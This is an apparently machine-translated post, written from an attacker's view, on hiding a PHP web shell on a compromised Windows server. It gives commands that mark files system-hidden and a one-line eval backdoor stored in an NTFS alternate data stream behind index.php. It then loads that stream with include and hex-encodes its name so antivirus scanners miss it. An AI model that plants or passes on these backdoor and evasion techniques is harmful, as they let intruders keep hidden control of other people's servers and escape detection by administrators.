Part 1 Preface
Hard to win the shell, a few days did not see, the administrator to delete.
Part 2 Hidden
Hiding a lot of tricks, nonsense not much to say directly to the beginning.
I. ATTRIB +s +h
Create a system-hidden file.
attrib +s +a +r +h/attrib +s +h file name
View hidden files
Two. Using Ads to hide files
NTFS-Switched data streams (Alternate data Streams, or ads) are an attribute of the NTFS disk format, where multiple streams of data can exist for each file under the NTFS file system. The popular understanding is that other files can be "hosted" on a file, while in the explorer you can only see the host file, unable to find the host file. Using the ADS data stream, we can do a lot of interesting things. (copy of)
1. First create an ads hidden file
At the command line, echo a data stream, such as the index file is a normal file.
echo ^<?php @eval($_request[1]);? ^> > Index.php:shell.jpg
This creates a index.php:shell.jpg that is not visible.
Use the DIR/R command to view
Modify and delete
Modify:
Enter the directory where the file is located, Notepad index.php:shell.jpg
How do I remove index.php:shell.jpg?
Delete index.php directly
2. The file contains
We have generated index.php:shell.jpg that can be used in a way that contains files.
include (' index.php:shell.jpg ')?>
can also use the above to learn the hidden include.php
3. Avoid killing
Hidden or not, Brother Dei,d Shield sweep exploded instantly.
Encode the index.php:shell.jpg hex
<? $a= "696e6465782e7068703a7368656c6c2e6a7067"// index.php:shell.jpg Hex Code $b= "a"; include (PACK(' h* ', $$b))?>
PHP Backdoor hiding tips